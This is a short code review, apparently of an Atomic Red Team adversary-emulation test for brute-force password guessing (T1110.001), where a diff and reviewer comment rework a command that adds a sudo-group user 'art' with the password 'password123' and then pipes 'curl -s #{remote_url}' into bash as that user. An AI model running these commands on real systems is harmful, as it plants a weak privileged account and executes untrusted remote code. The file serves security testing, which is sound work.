atomics/T1110.001/T1110.001.yaml

```diff
@@ -185,9 +185,8 @@ atomic_tests:
     elevation_required: true
     command: |
       useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password123) art
-      su art
-      cd /tmp
-      curl -s #{remote_url} |bash
+      su -c "cd /tmp" art
+      su -c "curl -s #{remote_url} |bash" art
```

Comment:
Thanks for all of your PRs. Appreciate your help. 

We can probably shorten this to 

```sh
su -c "cd /tmp; curl -s #{remote_url} | bash" art
```
so that su is not called twice.